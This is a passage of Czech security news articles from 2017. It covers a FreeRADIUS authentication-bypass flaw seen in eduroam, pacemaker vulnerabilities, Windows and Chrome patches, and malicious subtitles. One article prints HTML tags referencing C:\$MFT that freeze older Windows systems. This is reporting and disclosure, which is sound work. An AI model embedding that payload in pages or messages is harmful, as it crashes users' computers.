Druhý den kolega dorazil do práce a v průběhu dne jsme tak mezi řečí odbočili i k této záležitosti. Podívali jsme se do logů – a i tento den se stejné zařízení přihlásilo do eduroam pod účtem kolegy. Donutili jsme kolegu změnit si znovu heslo. Po změně hesla se notebook kolegy do WiFi nepřihlásil, dokud si na něm nenastavil nové heslo.

Po víkendu jsme se vrátili do práce – neznámé zařízení se opět přihlásilo pod účtem kolegy. To již začalo být podezřelé. První nás napadla chyba v konfiguraci RADIUS serveru. Prošel jsem všechny konfigurační soubory, spustil několik testovacích skriptů, ale nic jsem nenašel. V detailních logách požadavků a odpovědí vypadal průběh komunikace takto:

Při debugování jsme zjistili, že první komunikace skončí na začátku druhé fáze PEAP autentizace, kdy supplicant neodpoví na MS CHAPv2 Challenge. Zařízení následně zruší asociaci s přístupovým bodem, připojí se k jinému přístupovému bodu bezdrátové sítě a poté zkusí rychlé obnovení spojení (Fast Reconnect). To je úspěšné, čímž se úplně obejde autentizaci i autorizaci.

Z analýzy zdrojových kódů vyplynulo, že FreeRADIUSu ukládá údaje o spojení ihned po vytvoření TLS tunelu s předpokladem budoucí úspěšné autentizace. Pokud autentizace a autorizace ve druhé fázi není úspěšná (EAP Failure), tak se údaje spojení z cache vymažou. Autoři FreeRADIUSu neošetřili předčasné ukončení komunikace ve druhé fázi autentizace.

O ověření zranitelnosti jsem požádal Pavla Kaňkovského z MFF UK, kterému velmi děkuji, že se začal problému intenzivně věnovat. Analyzoval zdrojové kódy a následně upravil testovací aplikaci eapol_test na otestování zranitelnosti. Též nahlásil zranitelnost autorovi FreeRADIUSu a spolupracoval s ním na jejím odstranění. 26. května vyšel FreeRADIUS verze 3.0.14, který chybu opravuje. Zranitelnost má přiděleno označení CVE-2017–9148. Zajímavostí je, že zranitelnost byla nahlášena již dříve. První pokus o opravu z února 2017 se příliš nezdařil, verze 3.0.13 je stále děravá.

Na řešení se velkou měrou podílel i správce národní eduroam federace Jan Tomášek z CESNETu, který o zranitelnosti informoval správce z připojených institucí i správce z jiných zemí. Do monitorovacího systému české federace eduroam doplnil pravidelné testování zranitelnosti u jednotlivých členů.

Zneužívá se zranitelnost v praxi?
Zařízení, na kterém jsme si všimli nestandardní autentizace do eduroam, byl iPhone od firmy Apple. Používá ho výše postavený pracovník školy a sledování jeho komunikace by pro některé kruhy mohlo mít větší finanční smysl. Na mobilu nebyl jailbreak, ani nebyly nainstalovány nějaké neobvyklé aplikace. Začali jsme monitorovat jeho síťový provoz, po měsíci vyhodnocování si nemyslíme, že by někdo cizí mobil ovládal.

V logách z FreeRADIUSu jsme našli 22 zařízení, která se do eduroam přihlásila s využitím uvedené zranitelnosti. 16 zařízení je od firmy Apple, v některých případech se takto přihlašují do eduroam již přes 4 měsíce. Některá z nich se takto připojují téměř každý den.

Někteří vlastníci těchto mobilů si stěžovali, že s připojením do eduroam mají problémy – občas se jim mobil nepřipojí. V logách jsem našel případ jednoho zařízení, které se v průběhu dne snažilo připojit v 11:18, 11:53, 12:20, 12:40, 13:27,13:52 a 14:07. Teprve při posledním pokusu použilo fintu se zneužitím popisované zranitelnosti.

Na zapůjčeném iPhone 4S jsme byli schopni nasimulovat autentizaci bez ověření hesla. Obvykle stačí se jednou úspěšně přihlásit. Po změně hesla se zařízení dále „přihlašuje“ bez nutnosti zadat na něm nové heslo. Na iPhone se neobjeví dotaz na nové heslo. Na iPhone 6 s novější verzí IOS se nám zneužití zranitelnosti nasimulovat nepodařilo.

6 zařízení má nainstalováno některou verzi systému Android, nejstarší je 4.1.2, nejnovější 6.0.1. Zařízení jsou od čtyř různých výrobců: Samsung, Lenovo, Motorola, Huawei. Využití zranitelnosti není spojeno se změnou hesla. Zařízení se úspěšné autentizuje pomocí hesla, poté se několik dní nepřipojí, největší nalezená přestávka je 15 dní. A poté se připojí s využitím uvedené zranitelnosti, tj. první pokus se v průběhu druhé fáze PEAP autentizace přeruší a poté následuje autentizace s obnovením spojení. V následující dny se připojují s ověřením hesla. Vzhledem k počtu výskytů jsem schopen uvěřit tomu, že přerušení při prvním pokusu o autentizaci je způsobené výpadky na síti.

Řešení je snadné
Popisovaná zranitelnost FreeRADIUSu je spojena s ověřováním zařízení (supplicant) pomocí protokolu PEAP či EAP-TTLS. Týká se i ověřování v drátových sítích pomocí 802.1X.

Nenarazili jsme na upravený software na zařízeních, který by tuto zranitelnost aktivně využíval. Starší zařízení firmy Apple nejspíše neúmyslně využívají chybu k obcházení bezpečnostní politiky. Pokud nastavím nové heslo, tak očekávám, že se zařízení s uloženým starým heslem již znovu nepřihlásí. Náhodně mohou chybu použít i další zařízení k připojení do sítě.

Řešení je poměrně jednoduché:

vypnout ve FreeRADIUSu cachování TLS session. Ve verzi 3.0.x to znamená nastavit „enabled = no” v sekci cache souboru raddb/mods-enabled-eap.
upgradovat na FreeRADIUS 3.0.14.

Kardiostimulátory mají tisíce chyb, kupte ho na eBay a zkuste hacknout
9.6.2017 Root.cz Zranitelnosti
Nová studie firmy WhiteScope musí vyděsit i ty nejotrlejší kardiaky. V kardiostimulátorech se totiž našly tisíce bezpečnostních děr, a to hned na několika úrovních architektury.
WhiteScope je firma zabývající se bezpečností systémů a auditem kritických infrastruktur. Její nejnovější studie upozorňuje, že čtyři hlavní výrobci kardiostimulátorů používají ve svých zařízeních podobný architekturní rámec včetně komunikačních protokolů, vestavěného hardwaru a principů autentizace. A právě ve všech těchto úrovních se nalézají překvapivé zranitelnosti, kterých autoři studie popsali několik tisíc.

Jak kardiostimulátory fungují?
Na počátku bychom měli říci, jak kardiostimulátory fungují. Zjednodušeně se jedná o drobná zařízení velikosti cca klasické krabičky tictaců, která lékaři implantují pod kůži pacienta. Může se jednat třeba o kardiostimulátor, který srdci pacienta s poruchou srdečního rytmu „udává správný rytmus“. Druhým typem je implatabilní kardioverter-defibrilátor (ICD), který naopak hlídá, jestli se srdce pacienta nezačalo chaoticky stahovat zcela nekoordinovaně (čímž přestalo pumpovat krev do těla), a ve správnou chvíli dá výboj, jenž by měl znovu nastolit srdeční akci.

Přístroj je tedy implantovaný na hrudníku pod kůží pacienta, obsahuje řídicí jednotku, baterii a elektrody vedoucí k srdci.

K tomu, aby lékař mohl přístroj zkontrolovat a případně nastavit správné hodnoty stimulace, nemusí do pacienta řezat. Pro běžné kontroly a pohodlnou administraci slouží externí přístroj – tzv. programmer. Ten se ke kardiostimulátoru připojuje bezdrátově, nejčastěji radiofrekvenčním spojením či indukčně, tj. na krátkou vzdálenost přiložením sondy na hrudník pacienta.

V administračním rozhraní kardiostimulátoru lze nastavovat různé parametry stimulace, zjistit životnost baterie, zkontrolovat správné umístění elektrody v srdci či dokonce testovat, zdali přístroj správně vyhodnotí srdeční rytmus pacienta a zareaguje správně. Správcovské rozhraní umožňuje lékaři simulovat na vstupu různé arytmie a virtuálně sledovat, jak se přístroj zachová.

V zahraničí často bývají zařízení připojena bezdrátově i k domácí monitorovací jednotce, která data odesílá na server a umožňuje tím i vzdálené monitorování pacienta lékařem. V ČR je taková jednotka ale zatím spíše výjimkou.

Bezpečnostní díry
Hned na začátku studie autoří poukazují na lákavou možnost velmi levně pořídit kardiostimulátor na aukčním serveru eBay. Na to, že kardiostimulátor často stojí desítky až stovky tisíc, zde můžete použitý kousek koupit (často i s nahranými citlivými daty předešlého pacienta) v řádu jednotek tisíc, což je docela dobrý obchod.

WhiteScope.io
Natvrdo naprogramovaný přístup na server
Samozřejmostí a evergreenem je již zdrojový kód obsahující natvrdo naprogramované přístupové údaje do administračního rozhraní. Stejná potíž sužuje i ostatní zdravotnické přístroje, jak jsme již na Rootu psali.

WhiteScope.io
Ukázka natvrdo naprogramovaného hesla
Pokud si útočník sežene na internetu použitý kardiostimulátor, může se šroubovákem dopídit i jednotlivých komponent přístroje. Jednotlivé mikroprocesory a další součástky bývají podle sériových čísel dohledatelné na internetu, čísla na integrovaných obvodech umožňují zjistit ovládací signály a kódy, což autoři studie dokládají několika odkazy na velmi podrobné informace o architektuře konkrétních mikroprocesorů (např. MC9328MX21). Datové listy pak usnadní nalezení „správné cesty“ pro útočníkovo reverzní inženýrství.

Další nepříjemně zranitelnou částí je přítomnost debugovacího rozhraní, nejčastěji JTAG či UART. Tato rozhraní pomohou sledování firmwaru a jeho instrukcí, čtení paměťových segmentů a změnám hodnot registru.

Firmware bývá napsán průhledně, bezpečné techniky či šifrování bychom v něm hledali marně. Firmware nebývá digitálně podepsaný, aktualizace nevyžadují ověření zdroje kódu, souborový systém bývá jednoduše dostupný a čitelný. Nemluvě o tom, že data pacienta nebývají zabezpečena a zašifrována. Proto třeba v přístrojích z eBay naleznete pacientské údaje.

WhiteScope.io
Kód a systém souborů kardiostimulátoru
Autoři dokonce zjistili, že firmware často obsahuje i knihovny třetích stran – a to ve starých verzích se bezpečnostními dírami známými již v době výroby kardiostimulátoru. Těchto zranitelností pak u čtyř největších výrobců kardiostimulátorů napočítali několik tisíc.

Kardiostimulátor lze rovněž připojit k jakémukoli zařízení. Žádná autentizace neprobíhá, takže se k přístroji může bez problému připojit lékař s oficiálním přístrojem, domácí monitorovací jednotka i hacker.

Tolik teorie: co realita?
Jednotlivé zranitelnosti v kardiostimulátorech tvoří řetězec, který hackera může vést k úspěšnému útoku. Pokud není kardiostimulátor zprostředkovaně připojen k síti (přes domácí monitorovací jednotku, bluetooth, apod.), tak je dostupný jen na kratší vzdálenost zhruba do deseti metrů.

Na tuto vzdálenost se již několika lidem podařilo proniknout do administračního rozhraní kardiostimulátoru a buď vybít baterii nepřiměřenou komunikací s přístrojem, nebo přenastavit hodnoty kardiostimulace (což pacienta může ohrozit na životě při arytmii) či dokonce (u přístrojů ICD) nabít kondezátory a vyslat smrtící výboj přímo na místě.

Někdejší americký viceprezident Dick Chenney si nechal bezdrátové rozhraní svého kardiostimulátoru vypnout kvůli obavám z atentátu.

Kardiostimulátory připojené do sítě třeba díky domácí monitorovací jednotce jsou samozřejmě zranitelné i na mnohem větší, teoreticky neomezené, vzdálenosti. Jak jsem psal na začátku, takových přístrojů je v ČR zatím minimum.

Kardiostimulátorům se do své tragické smrti věnoval Barnaby Jack, novozélandský white-hat hacker. Marie Moe je již dlouhodobě známá bezpečnostní expertka. Ve svém relativně mladém věku musela dostat kardiostimulátor a tehdy se začala zajímat o jejich zabezpečení. Za bezpečnost kardiostimulátorů tvrdě bojuje a opakovaně vystupuje s morálně i emocionálně děsivými přednáškami na různých konferencích (TEDxVicenza, 32C3, Lerchendal Conference).

Zatím jsou známy spíše studie a testy různých odborníků, tvrdý útok na pacienta s kardiostimulátorem snad ještě popsán nebyl. Nicméně musíme přiznat, že dveře jsou útočníkům zatím doširoka otevřené.

Celou studii si můžete přečíst na blogu WhiteScope.

Google odstranil na 30 chyb v prohlížeči Chrome

9.6.2017 Novinky/Bezpečnost Zranitelnosti
Na třicet bezpečnostních děr v internetovém prohlížeči Chrome řeší nová verze tohoto prohlížeče, kterou tento týden uvolnila společnost Google. Chrome 59, jak se tato verze nazývá, zároveň vylepšuje některé funkce.
Při vyhledávání zranitelností Google využil skupinu externích spolupracovníků, jimž podle závažnosti odhalených bezpečnostních děr vyplácí různě vysoké odměny. V tomto případě šlo souhrnně o více než 23 tisíc dolarů (téměř 600 tisíc korun).

Nejzávažnější zjištěná zranitelnost Chrome, již v polovině května odhalili Zhao Qixunem a SørryMybadem z týmu Qihoo 360 Vulcan, se týkala V8 JavaScript jádra. Google za její odhalení vyplatil 7500 dolarů, informoval server SecurityWeek.com.

Po třech tisících dolarů si rozdělili vývojáři Choongwoo Han a Rayyan Bijoora za popsání bezpečnostních děr u hlášení chybových stránek. Nižší odměny vyplatil Google za chyby středního a nízkého stupně závažnosti, jež lze jednoduše napravit a nepředstavují tak velké bezpečnostní riziko.

Google zvyšuje odměny hledačům chyb
Od spuštění programu odhalování bezpečnostních chyb Chrome v roce 2010 vyplatil Google celkem již přes devět miliónů dolarů (téměř čtvrt miliardy korun) za pomoc externím spolupracovníkům při vyhledávání těchto slabých míst. Jenom v loňském roce šlo o více než tři milióny dolarů (75 miliónů korun). Vzhledem k tomu, že vyhledávání zranitelností je stále obtížnější, rozhodla se firma zvýšit odměny za poskytnutí informací o kritických chybách v jejím internetovém prohlížeči.

„Aktivita Google je chvályhodná, protože bezpečnostní chyby v internetových prohlížečích bývají jednou z hlavních cest, kudy se k uživatelům dostávají různé škodlivé kódy,“ říká Václav Zubr, bezpečnostní expert společnosti ESET. „V dnešní době se nové verze známých webových prohlížečů stahují na pozadí automaticky. Ze strany uživatele je nutné pouze restartovat prohlížeč. S tím by lidé neměli otálet, mohou tak předejít různým nepříjemnostem a překvapením.“

Aktualizace prohlížeče i používaného softwaru společně s používáním kvalitního antivirového programu patří podle Zubra k základním pravidlům bezpečného používání internetu.

Nebezpečné chyby ve Windows ohrožují milióny uživatelů

9.6.2017 Novinky/Bezpečnost Zranitelnosti
Český Národní bezpečnostní tým CSIRT.CZ varoval před několika chybami, které se týkají různých verzí operačního systému Windows. Zneužít je mohou počítačoví piráti k tomu, aby propašovali libovolný virus do cizího počítače. Podle nejstřízlivějších odhadů tyto trhliny ohrožují milióny uživatelů z různých koutů světa.
Hned na úvod je nutné zdůraznit, že americký Microsoft již pro objevené chyby vydal mimořádné bezpečnostní záplaty. Uživatelé se tedy mohou relativně snadno bránit.

Podle serveru Bleeping Computer však celá řada uživatelů instalaci aktualizací podceňuje, a tak se počet nezáplatovaných strojů relativně snadno vyšplhal až na několik miliónů. Právě takové stroje – tedy ty, které nemají nainstalované aktualizace – dávají jejich majitelé všanc počítačovým pirátům.

Windows Defender i Exchange Server
„Mimořádná aktualizace opravuje řadu chyb v tzv. Microsoft Protection Engine, který je obsažen například ve Windows Defenderu či Exchange Serveru,“ přiblížil Pavel Bašta, bezpečnostní analytik CSIRT.CZ, který je provozován sdružením CZ.NIC.

Jak je z řádků výše zřejmé, chyba tedy není obsažena přímo v operačním systému Windows. Vzhledem k tomu, že zmiňovaný antivirový program Defender je nedílnou součástí Windows 8 a 10, týká se bezpečnostní riziko uživatelů obou zmiňovaných verzí operačního systému od Microsoftu.

Všechny chyby mají nálepku kritické, mohou je tedy snadno zneužít počítačoví piráti. „Pět z nich umožňovalo útok typu DoS a další z nich pak vzdálené spuštění libovolného kódu,“ doplnil Bašta.

S instalací aktualizace neotálet
Při útoku typu DoS mohou počítačoví piráti vyřadit některé služby, které na počítači uživatel využívá. Daleko větší riziko však představuje možnost vzdáleného spuštění programů – touto cestou totiž mohou kyberzločinci do napadeného stroje propašovat prakticky libovolný škodlivý kód.

Lidé, kteří využívají automatické aktualizace, se nemusí o nic starat.

Kardiostimulátory obsahují na 8000 bezpečnostních chyb, varovali experti

5.6.2017 Novinky/Bezpečnost Zranitelnosti
Jeden z nejčastěji používaných umělých nástrojů, který dokáže udržet naživu těžce nemocné pacienty, v sobě skrývá neuvěřitelné množství potenciálních hrozeb. Na kybernetická rizika spojená s kardiostimulátory upozornila společnost White Scope, která analyzovala práci sedmi různých programátorů těchto zdravotních pomůcek od čtyř různých výrobců.
Ilustrační obrázek

Zjistila, že během přípravy kardiostimulátorů došlo k tisícům chyb v knihovnách třetích stran, které mohou zapříčinit problémy při aktualizacích zabezpečení softwaru na těchto citlivých zařízeních.

Všichni sledovaní programátoři navíc používali zastaralý software se známými druhy zranitelností. Mnoho z nich pracovalo ještě v operačním systému Windows XP, který již není podporován a nevydávají se pro něj bezpečnostní záplaty. Firma také odhalila, že programátoři kardiostimulátorů nijak neověřují při přístupu k zařízení svoji totožnost, a stejně tak se chovají i lékaři.

Přístup do programovacího softwaru tak není chráněn žádným přihlašovacím jménem a heslem. Každý programátor kardiostimulátorů tak může kdykoli přeprogramovat výrobek od stejného výrobce.

Použité kardiostimulátory lze koupit na eBay. S daty pacientů
Všechny zkoumané kardiostimulátory také neměly zašifrované souborové systémy u snímatelných médií. Společnost White Scope rovněž zaznamenala nedostatek kryptografických podpisů u firmware kardiostimulátoru.

Zařízení by tak mohl kdokoli aktualizovat pomocí vlastního firmwaru. Výčet chyb tím ale zdaleka nekončí. Výzkumníci s hrůzou zjistili, že kardiostimulátory pro testování mohou volně nakoupit na eBay. Některé z nich byly použité a obsahovaly nezašifrované údaje o pacientech.

Architektura i technická implementace kardiostimulátorových systémů od různých výrobců jsou podle White Scope překvapivě podobné. „Máme podezření, že mezi výrobci kardiostimulátorů dochází k určité vzájemné spolupráci.

Vzhledem k podobnosti systémů doufáme, že výrobci spolupracují i na inovativních návrzích v oblasti kybernetické bezpečnosti a budou se snažit získávat zkušenosti od uživatelů kardiostimulátorů,“ uvedla firma v tiskovém prohlášení.

Na dálku je lze zneužít k vraždě pacienta
Kardiostimulátory nejsou pod drobnohledem kvůli nedostatečné kybernetické ochraně poprvé. V roce 2012 bezpečnostní expert Barnaby Jack ze společnosti IOActive prokázal, že některé kardiostimulátory od několika výrobců mohou být řízeny na dálku a prostřednictvím notebooku u nich může útočník vyvolat 830voltový šok, což by vedlo k úmrtí pacienta.

Jack tehdy poznamenal, že by následkem nemusela být smrt jednoho člověka, ale dokonce „masová vražda“.

„U tak citlivých zařízení, jako je kardiostimulátor, bychom očekávali nejvyšší úroveň zabezpečení před kybernetickými útoky. Tady nejde o zašifrování dat na počítači, ale o přímé ohrožení životů pacientů,“ zdůrazňuje Václav Zubr, bezpečnostní expert společnosti ESET.

Windows Vista až 8.1 obsahují hloupou chybu. Po kliknutí na odkaz systém zamrzne
26.5.2017 CNEWS.CZ Zranitelnosti

Na webu habrahabr.ru autor upozorňuje na nepříjemnou chybu ve Windows Vista a novějších (mimo Windows 10), respektive jejich ovladačích souborového systému NTFS. V NTFS je v kořenovém adresáři skrytý soubor s názvem $MFT, který ukládá informace o všech souborech, složkách a jejich metadatech. Windows se stará o to, aby k němu nikdo neměl přístup.

Pokud se ale pokusíte otevřít neexistující soubor ve smyšleném adresáři $MFT (například C:\$MFT\ahoj), soubor $MFT se zamkne, což zablokuje všechny souborové operace. Aplikace a operační systém nakonec zamrznou. Pomůže jen restart.

$Windows spadl při pokusu o čtení souboru c:\$MFT\ahoj$
Windows spadl při pokusu o čtení souboru c:\$MFT\ahoj
Smyšlený soubor nemusíte otevírat ručně. Někdo na něj může odkázat v formou HTML kódu, typicky na webu. Chybu jsem vyzkoušel ve Windows 8.1. IE se neubránil. Stačilo otevřít lokální HTML soubor, ve kterém byla značka s obrázkem <img src=“file:///C:/$MFT/ahoj“>. Místo obrázku je možné použít i odkaz, na který je třeba kliknout <a href=“file:///C:/$MFT/ahoj“>neklikej</a>.

Chrome a Firefox odolaly zavolání souboru přes značku obrázku, ale po kliknutí na odkaz již také zamrzly a následně i Windows. Takto to ovšem fungovalo jen s lokálně uloženým HTML souborem. Pokud jsem otevřel vzdálený přes WWW, tak už Chrome i Firefox byly imunní. Internet Explorer ale opět zešílel.

Systému při útoku nehrozí nebezpečí a cílová skupina je také poměrně úzká, takže se většina lidí nemusí ničeho obávat.

Podobnou chybou mimochodem trpěly i Windows 95 a 98. U nich systém skončil na modré obrazovce smrti, pokud se snažil přistoupit na c:/con/con nebo c:/aux/aux. Chybu bylo možné zneužít i v chatovacích službách či e-mailu s podporou HTML zpráv. Stačilo zavolat obrázek, který se měl nacházet na uvedených adresách.

Netrvalo to dlouho a Microsoft počítačům s Windows 10 v1703 dodává další balík oprav

26.5.2017 CNEWS.CZ Zranitelnosti

Čerstvé vydání Windows je potřeba opravit.

Microsoft vydal další kumulativní aktualizaci pro Windows 10 v1703. Záplatovací úterý sice není, ale Creators Update je stále dost čerstvý a prochází fází intenzívního ladění. Microsoft za pochodu díky zpětné vazbě řeší problémy a systém postupně nasazuje na dalších strojcích. Zatím se nachází jen na 18 % počítačů s Windows 10.

Proto aktualizace vyšla jen pro verzi 1703, zatímco starší a již odladěná vydání Desítek Microsoft nechává spát (až do dalšího záplatovacího úterý). Aktualizace nese označení KB4020102 a číslo sestavení zdvihá na 15063.332. Oprav přináší požehnaně:

Autentizační protokol NTLM nevygeneroval správnou odpověď, když byl aktivní CredGuard, současně bylo používáno NTLMv2 a server poskytl informaci o neexistujícím cíli.
Internet Explorer při otevírání oblíbených položek nerespektoval nastavené pravidlo, aby posílal do Edge všechny stránky, které nejsou zahrnuty seznamu používaném v režimu Enterprise.
V běžném uživatelskému účtu bez správcovských oprávnění nebylo možné v Internet Exploreru 11 instalovat prvky ActiveX.
Některé aplikace přestaly reagovat na vstupní signály, pakliže jste používali více obrazovek současně a rozložili jste na jedné z nich vedle sebe dvě aplikace, takže dohromady vyplňovaly celou obrazovku.
V některých dialozích pro přihlášení k účtu se zcela zbytečně zobrazoval posuvník. Navíc mohl blokovat některá pole.
Virtuální počítač mohl něčem resetu začít využívat techniku Second Level Paging (používanou v případech, kdy dochází paměť), přestože se na hostitelském stroji nacházelo ještě dost paměti.

Nová várka oprav pro Creators Update
V případě některých písem, jež nepodporují Unicode, např. Courier nebo MS Sans Serif, se nevykreslovaly správně znaky. Týkalo se to jen některých jazykových mutací Windows.
Aplikace pro zasílání SMS přestala fungovat při pokusu o odstraněních zpráv.
Po instalaci Creators Updatu nemusely fungovat externí dekodéry zvuku, takže chyběl zvukový výstup.
Prostředí IoT selhávalo ve sledování běhu aplikací na pozadí.
Při používání API MIDI pro Universal Windows Platform byla znatelná vysoká odezva.
Při použití softwaru od výrobce se na počítačích s méně než 4 GB operační paměti nebylo možné nainstalovat síťovou tiskárnu.
PrintBRM selhal v obnově nastavení tiskové fronty, pokud se v systému nacházely stejně pojmenované tiskárny a port byl nastaven na hodnotu FILE:.
Nastavení proxy v uživatelských účtech nemuselo být přeneseno do systémového nastavení proxy.

Díra, na kterou nikdo nemyslel. Počítač můžete ohrozit stažením titulků k filmu
25.5.2017 CNEWS.CZ Zranitelnosti
Výzkumníci bezpečností společnosti Check Point upozornili na závažnou díru, která se nachází v softwarových přehrávačích filmů. Pomocí nakažených titulků můžou hackeři napadnout váš počítač a vzdáleně jej kompletně ovládnout. Zranitelnost obsahují například VLC, Kodi (XBMC) nebo streamovací platformy Popcorn Time či Stremio. Ohroženo je podle odhadů až 200 milionů zařízení.

Tyto přehrávače mají funkci pro automatické stažení titulků dle vybraného jazyka. Stahuje se z některých veřejných repozitářů, jako je například OpenSubtitles.org. Vždy by se automaticky měly vybrat ty s nejlepším hodnocením. Check Pointu se ovšem podařilo do repozitáře nahrát falešné titulky a ještě zmanipulovat hodnocení tak, aby se právě ony vybraly pro autostažení.

Hackování skrz titulky k filmu
Takový soubor ani neuvidíte. Jako hrozbu jej nevidí ani antivirový software. Kód se zkrátka spustí a otevře počítač pro vnější útok. Check Point ukázal i na videu, že po načtení titulků se otevřelo spojení a pak se mohl k počítači oběti připojit přes VNC.

Check Point nezveřejnil detaily hack a exploit ještě také nepublikoval. Upozornil ale tvůrce softwaru a ti už vydali první opravy. Jen u Kodi jsou zatím k dispozici pouze zdrojové kódy, nikoliv připravený binární instalátor.

Windows XP dostala po letech důležitou aktualizaci

16.5.2017 Novinky/Bezpečnost Zranitelnosti
Operační systém Windows XP šel do důchodu už před třemi roky, společnost Microsoft pro něj tehdy oficiálně ukončila podporu. Nyní se však zástupci amerického softwarového gigantu odhodlali k nečekanému kroku – vydali velmi důležitou aktualizaci. S její instalací by uživatelé neměli v žádném případě otálet.
Poslední hřebík do rakve svého času velmi populárních xpéček zasadil americký softwarový gigant v dubnu roku 2014. Tehdy pro něj naposledy vyšly aktualizace.

Případné bezpečnostní chyby od té doby nejsou tedy jakkoli řešeny a hackeři je mohou dle libosti zneužít. Stejně tak už nevycházejí nové aktualizace ovladačů, což může mít vliv na funkčnost s novými periferiemi.

Takový byl tedy alespoň původní plán. Americký softwarový gigant byl však nucen nyní svůj postoj přehodnotit, neboť se ukázalo, že systém Windows XP obsahuje vážnou zranitelnost, která dopomohla k šíření vyděračského viru WannaCry.

Statisíce infikovaných strojů
Tento nezvaný návštěvník se začal internetem šířit už v pátek. Za pouhých pár hodin stačil infikovat na 200 tisíc počítačů ve více než 150 zemích světa. Mezi postiženými se objevili nejen jednotliví uživatelé, ale také univerzity, benzínky, nemocnice, dráhy a řada dalších společností.

Antivirová společnost Avast uvedla, že škodlivý kód WannaCry útočil také v Česku. Napadl zde podle prvních odhadů na 400 počítačů. Tak velkou silou, a navíc v tak velkém měřítku zatím žádný ransowmare neútočil. A to přitom různých variant vyděračských virů existují bez nadsázky tisíce.

Microsoft se proto rozhodl vydat mimořádnou záplatu pro Windows XP i přesto, že již tento systém není léta podporovaný. A to se zatím nikdy v historii amerického softwarového gigantu nestalo.

Nezvyklý krok ze strany Microsoftu je vcelku pochopitelný. Xpéčka totiž stále ještě používá každý dvacátý uživatel, což není rozhodně zanedbatelné číslo. I podle nejstřízlivějších odhadů tak tento nepodporovaný systém stále používají stovky tisíc lidí.

Podpora skončila, systém nikoliv
Ukončení podpory ze strany Microsoftu neznamená, že by tento populární operační systém přestal ze dne na den fungovat. S trochou nadsázky se dá říci, že Windows XP jsou nesmrtelná. Pokud o to uživatelé budou stát, mohou na počítačích fungovat klidně další desítky let.

Microsoft samotnou funkčnost nijak neomezil, vše funguje jako před ukončením podpory. Problém však představuje absence bezpečnostních záplat. Riziko nákazy počítačovým virem je u xpéček až šestkrát vyšší než u osmiček, což dokládá zpráva Security Intelligence Report 15, která analyzuje informace o počítačových hrozbách z více než miliardy počítačů po celém světě.

Adobe, Microsoft i Cisco. Podniky záplatují nebezpečné trhliny jako o život

12.5.2017 Novinky/Bezpečnost Zranitelnosti
Hned několik bezpečnostních chyb se objevilo v produktech společnosti Microsoft. Kromě amerického softwarového gigantu vydaly záplaty pro objevené trhliny také společnosti Adobe či Cisco.
Na vydání záplat hned u několika hojně používaných softwarových produktů upozornil Národní bezpečnostní tým CSIRT.CZ, který je provozován sdružením CZ.NIC.

Největšího počtu uživatelů se patrně týkají záplaty, které byly vydány pro programy amerického softwarového gigantu. „Společnost Microsoft vydala pravidelný měsíční balík aktualizací. Jsou zde záplaty zranitelností serverových i klientských operačních systémů, pro webový prohlížeč Internet Explorer, Microsoft .NET Framework a další,“ uvedl Pavel Bašta, bezpečnostní analytik CSIRT.CZ.

Kritická chyba ve Windows Defenderu
„Kromě pravidelného balíku vydal Microsoft navíc i kritickou bezpečnostní aktualizaci opravující chybu ve Windows Defenderu umožňující vzdálenému útočníkovi spustit libovolný kód s oprávněním LocalSystem,“ konstatoval Bašta.

To zjednodušeně znamená, že kvůli chybě mohou počítačoví piráti propašovat do napadeného systému prakticky libovolný škodlivý kód. Snadno tak mohou klidně i převzít kontrolu nad celým počítačem, což v podstatě platí i pro všechny další kritické trhliny.

Opravy bezpečnostních chyb se týkají také společností Cisco a Adobe. „Společnost Cisco vydala bezpečnostní aktualizace řešící bezpečnostní zranitelnosti v softwaru IOS a IOS XE. Další bezpečnostní aktualizace vydala i společnost Adobe. Zveřejněné záplaty řeší zranitelnosti v Adobe Flash Playeru a Adobe Experience Manageru,“ prohlásil bezpečnostní expert.

S instalací neotálet
Právě zmiňovaný Flash Player používá na celém světě několik stovek miliónů lidí. Kvůli velké popularitě se na něj zaměřují kybernetičtí nájezdníci pravidelně. Podle analýzy bezpečnostní společnosti Record Future cílilo osm z deseti nejrozšířenějších hrozeb v roce 2015 právě na tento přehrávač videí.

S instalací aktualizace Flash playeru – ale zároveň také softwarových produktů dalších společností – by tak uživatelé neměli otálet. „Ve všech případů mohlo zneužití těchto chyb umožnit v nejzazším případě útočníkovi převzít kontrolu nad postiženým systémem,“ uzavřel Bašta.

Microsoft musel opravit desítky chyb ve svých produktech

12.5.2017 SecurityWorld Zranitelnosti
Microsoft v úterý vydal sadu bezpečnostních patchů pro celkem pětapadesát chyb v hned několika svých produktech. Minimálně tři z nich už přitom byly v minulosti zneužity, patnáct těchto chyb pak společnost kategorizovala jako „kritické“.

Chyby se nacházely jak ve Windows, tak v Microsoft Office, prohlížečích Edge i Explorer, ale také v enginu paradoxně určenému na ochranu proti malwaru. Vzhledem k závažnosti chyb by měl mít pro uživatele aktuální balíček záplat jasnou prioritu.

Mezi chybami odborníci vypichují ty s kódovým označením CVE-2017-0261 a CVE-2017-0262 nalezené v procesu, jakým Microsoft Office zpracovává obrázkové soubory s příponou EPS. Od března z ní prý těžila zatím neidentifikovaná skupina finančně motivovaných kyberzločinců a také ruská hackerská skupina Turla, jež v minulosti proslula útoky na ty nejvyšší instituce, jako jsou vládní orgány, zpravodajské agentury, ambasády nebo firemní korporace.

Pozadu prý nezůstávali ani krajané APT28, kteří jsou dle některých spekulací navázáni na ruskou zpravodajskou službu GRU. Útočníci obětem rozesílali wordovské dokumenty obsahující škodlivý EPS obsah, skrz který se dokázali dostat k dalším datům v napadeném počítači.

Microsoft však podotýká, že ač technicky byla chyba CVE-2017-0262 záplatována až tento týden, ti, kteří si stáhnuli dubnové aktualizace Microsoft Office, už před ní byli chráněni.

Na nutnost aktualizovat Explorer a Edge pak společnost upozorňuje proto, že nové patche zabraňují napadení počítače skrz speciálně vytvořené škodlivé reklamy na pochybných webových stránkách. Veřejně se však zatím ví o zneužití této chyby v Exploreru, případ zneužití v Edge není znám.

Updaty pro Windows se pak týkají několika chyb v protokolu SMB, určenému ke sdílení souborů v rámci operačního systému.

Hackeři se dostanou do PC kvůli chybě monitorů. V ohrožení jsou milióny zařízení

27.4.2017 Novinky/Bezpečnost Zranitelnosti
Počítačoví piráti zpravidla hledají různé bezpečnostní skuliny v operačním systému nebo v jednotlivých nainstalovaných aplikacích, aby si tak otevřeli zadní vrátka do cizích PC. I když to může znít na první pohled neuvěřitelně, stejně tak mohou zneužít k útoku monitory, respektive jejich ovládací software.

Chyba se týká ovládacího softwaru monitorů od společnosti Portrait Displays, který však využívá drtivá většina výrobců.
FOTO: repro portrait.com
Dnes 9:02
